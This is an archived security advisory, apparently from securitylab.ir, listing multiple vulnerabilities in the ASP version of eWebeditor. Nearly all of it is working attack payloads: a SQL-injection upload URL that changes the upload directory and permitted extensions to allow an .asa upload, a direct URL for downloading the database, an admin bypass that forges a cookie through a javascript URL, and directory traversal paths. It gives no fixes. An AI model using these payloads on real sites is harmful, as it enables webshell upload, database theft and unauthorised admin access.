AOH :: HP Unsorted E :: BU-1660.HTM

eWebeditor ASP Version Multiple Vulnerabilities



eWebeditor ASP Version Multiple Vulnerabilities
eWebeditor ASP Version Multiple Vulnerabilities



#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: eWebeditor
# Version: ASP
#################################################################
Vulnerability:

======================Arbitrary File Upload
======================
"http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">



 

======================Arbitrary File Upload 2 ======================http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup ======================Database Disclosure ======================http://site.com/ewebeditor/db/ewebeditor.mdb ======================Administrator bypass ======================http://site.com/eWebEditor/admin/login.asp put this code instead URL javascript: alert (document.cookie = "adminpass =" + escape ( "admin")); ======================Directory Traversal ======================http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./.. ======================Directory Traversal 2 ======================http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./.. ################################################################# # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com ###################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.